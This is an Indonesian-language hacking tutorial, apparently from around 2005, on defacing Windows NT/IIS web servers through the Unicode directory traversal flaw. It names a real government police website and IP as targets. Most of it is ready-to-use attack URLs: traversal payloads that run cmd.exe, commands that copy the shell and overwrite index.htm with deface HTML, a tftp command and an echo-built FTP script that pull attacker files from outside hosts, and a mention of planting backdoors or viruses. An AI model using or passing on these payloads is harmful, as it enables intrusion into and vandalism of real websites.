|
[084].
Tutorial Deface Unicode-OS
Target : Windows NT/9x/2000
------------------------------------------------------
Author : Janngkr|k
Contact : -
CopyLEFT (c) 2006
www.spyrozone.tk All Rights Reserved
� 15/09/2005 17:20:16 WIB
------------------------------------------------------
Ini Hendaknya Dijadikan Bahan
Percobaan untuk Belajar
1. Kita Harus menentukan WebSite Target/Sasaran Kita : contoh : www.polri.go.id
:
2. Login Ini Merupakan Directory yang Ada Di WebSite Tersebut
Directory Ini Di Konfigurasi dengan Script tertentu Supaya file dalam Web
tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa menembus
web ini. Ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc
3. Unicode ===> Merupakan code yang dapat membaca script konfigurasi website
tersebut code ini yang dapat membaca bug cgi nya. hasil codingnya seperti bisa
1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..
4. OS Target ===> ini Menyatakan Sertificate Web OS kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1
5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite dengan Command " Echo "
==========================================
(1) Secara umum :
http://target/login/unicode/os/system/c+dir
atau http://www.polri.go.id/login/unicode/os/system/c+dir
http://202.155.24.200/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah
menembus web site itu. Maka Yang terlihat pada brower kita adalah list yang
berupa isi hardisk webserver tersebut sama halnya command dir yang kita lakukan
di Dos Prompt.
Directory of c:\
10/05/2001 19:56 <DIR> Programs Files
10/05/2001 19:56 <DIR> Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 <DIR> AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
(2) Setelah berhasil lihat List Hardisk Kita Harus cari "Path_Translade" web nya
dengan menggunakan command : " /c+dir+c:\ " di ubah menjadi " /c+set "
http://202.155.24.200/cgi_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/winnt/system32/cmd.exe?/c+dir+c:\
menjadi
http://202.155.24.200/cgi_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/winnt/
system32/cmd.exe?/c+set.
" /c+dir+c:\ " di ubah menjadi " /c+set "
http://202.155.24.200/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+set
Maka Akan keluar "CGI error" yang isinya menyatakan "Configurasi Batch Sytem
WebServer" tersebut
Keluar Macam - Macam File, Yang Perlu dilihat cuma :
Path_Translade=d:\wwwpolri
(3) Langkah Selanjutnya Adalah Copy file " cmd.exe " dengan nama baru, misal "
cmd1.exe " atau nama anda contoh " jangkrik.exe " dengan mengganti " /c+dir+c:\
" menjadi " /c+copy+c:\ ".
lalu tambahkan dengan : winnt\system32\cmd.exe+c:\jangkrik.exe
Sehingga kita dapatkan
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/
c+copy+c:\winnt\system32\cmd.exe+c:\jangkrik.exe
Sekarang Anda bisa melihat file " cmd1.exe " sudah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\
Tujuan Ini Sebenarnya untuk menyingkat command pada addres IE kita.
(4) Kemudian Cari halaman index ke www.target.com/blah.ida
Kadang-kadang ekstensi " .ida " yang tidak diketahui akan merespon lokal path.
Kalo trik " .ida " tidak bekerja, coba gunakan direktori " InetPub " :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\wwwroot\
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:\inetpub\
wwwroot\index.htm
(5) Setelah tau dimana letak file " index.htm" nya dengan kata lain folder
webnya. Sebaiknya, kita backup dulu "index.htm ", dengan cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:\inetpub\
wwwroot\index.htm+c:\inetpub\wwwroot\index.htm.bak
<=== file backup
(6) Baru Kita deface atau kita echo Halaman Depannya dengan command dibawah ini
:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?
/c+echo+You%20Were%20Hacked+>+c:\inetpub\wwwroot\index.htm
Supaya tidak merusak web nya kita tulis dengan nama file baru :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?
/c+echo+You%20Were%20Hacked+>+c:\inetpub\wwwroot\jangkrik.htm
/c+echo+You%20Were%20Hacked+>+c:\ ===> adalah untuk menuliskan kata-kata "You
Were Hacked" pada
" c:\inetpub\wwwroot\index.htm " file yang ditulis atau c:\inetpub\wwwroot\jangkrik.htm
file yang ditulis.
Untuk Anda yang telah Paham Bahasa HTML Kalau pengen Hasil Defacenya keren
Gunakan command ini :
/c+echo"<html><head><title>..::Website Has Been Deface BY Jangkr|k:..</title><body
Bgcolor%3dBlack Text%3dRed><center>This Website Deface BY <marquee
bgcolor%3dWhite Text%3dred><b>....:::J.A.N.G.K.|.K:...</b></marquee><br>Thanks
To People On Irc.Dal.net %23MinangCrew And %23PadangHack<br><img
src%3D%22http://gaibsetan.f2g.net/hacking.jpg%22></body></html>"+>+c:\inepub\
wwwroot\index.htm
/c+echo"<html><head><title>..::Website Has Been Deface BY Jangkr|k:..</title><body
Bgcolor%3dBlack Text%3dRed><center>This Website Deface BY <marquee
bgcolor%3dWhite Text%3dred><b>....:::J.A.N.G.K.|.K:...</b></marquee><br>Thanks
To People On Irc.Dal.net %23MinangCrew And %23PadangHack<br><img
src%3D%22http://gaibsetan.f2g.net/hacking.jpg%22></body></html>"+>+
c:\inepub\wwwroot\jangkrik.htm
: Keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
(7) Langkah terakhir untuk melihat hasilnya untuk Membaca file yang lain dengan
menggunakan perintah 'type' :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:\inetpub\
wwwroot\index.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:\inetpub\
wwwroot\jangkrik.htm
Untuk lebih jelasnya langsung saja : http://www.polri.go.id/ atau
www.polri.go.id/jangkrik.htm
Jika Anda menemukan webserver dalam penulisannya accses denied ( penolakan
penulisan ) Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara " tftp "
==========================================
Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com
ketik keyword nya TFTP32.
Mari kita mulai meng-uploadnya. Perintahnya sesuai langkah berikut ini :
(1) Kita Lakukan dengan Langkah, pada deface dengan " echo " untuk mencari
vulnerable-nya
sehingga kita mendapatkan hole/scriptnya.
http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
Langkah selanjutnya adalah meng-uploadnya lagi. Namun Sebelumnya kita sudah
menyiapkan File htmlnya untuk halaman web defacenya.
(2) Setelah semua siap baru kita upload dengan command seperti berikut :
http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP
mu)+get+antique.htm (file yg mau anda up-load)+ C:\InetPub\wwwroot\main.html
(3) Kita lihat apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are :
Selamat Anda telah berhasil meng-upload file Anda memakai "Sofware TFTP32" tadi
silahkan buka web site target tadi. Kekurangannya dalam meng-upload file lewat
TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita
tadi, Jika itu terjadi maka gunakanlah cara yang pertama tadi, yaitu dengan
command "echo".
C.) Dengan Cara Ftp dengan Web Kita yang telah Kita Isi Dengan Bahan Deface
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan.
di web itu kita drop halaman web deface kita atau backdoor, virus atau program
lainnya.
Selanjutnya kita lakukan Sama dengan Cara diatas. Setelah Anda tau hole cgi-bug
or unicodenya maka Anda lakukah-langkah berikut ini:
a.) Setelah kita menemukan vulnernya
http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:\
Directory of c:\
10/05/2001 19:56 <DIR> Programs Files
10/05/2001 19:56 <DIR> Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 <DIR> AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy, seperti langkah diatas
c.) Lalu Kita Lihat +set nya untuk melihat patch translade nya
http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kiranya path-nya ada di c:\inetpub\wwwroot\
d.) Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.target.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+lcd+c:\inetpub\wwwroot\+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:\inetpub\wwwroot\jangkrik.ftp
- http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:\inetpub\wwwroot\jangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script-nya apa benar
http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:\inetpub\wwwroot\jangkrik.ftp
Setelah selesai scriptnya kita jalankan lagi script nya:
http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:\inetpub\wwwroot\jangkrik.ftp
Buka IE satulagi untuk melihat filenya kira-kira sudah ada belum
http://www.target.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot\
Kalau sudah terkirim selamat dah :)
: Keterangan nya :
==================
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya open geocities.com
--->>> scriptnya --->> +echo+open+geocities.com+>>+c:\inetpub\wwwroot\jangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:\inetpub\wwwroot\jangkrik.ftp
anuamakang --->>> password --->>> scriptnya
-->> +echo+anuamakang+>>+c:\inetpub\wwwroot\jangkrik.ftp
lcd c:\inetpub\wwwroot\ --->>> folder tujuan --->>>
scriptnya
-->>>+echo+lcd+c:\inetpub\wwwroot\+>>+c:\inetpub\wwwroot\jangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:\inetpub\wwwroot\jangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>>
+echo+get+jangkrik.htm+>>+c:\inetpub\wwwroot\jangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya
--->>> +echo+close+>>+c:\inetpub\wwwroot\jangkrik.ftp
==================================================
NB:
- Scanner IIS bisa didownload di
member area of Spyro Zone.
- Buat mas Janngkr|k,
segera hubungi Spyro dunk... penting banget neeh.. :)
/* ------------------------------|EOF|------------------------------ */
|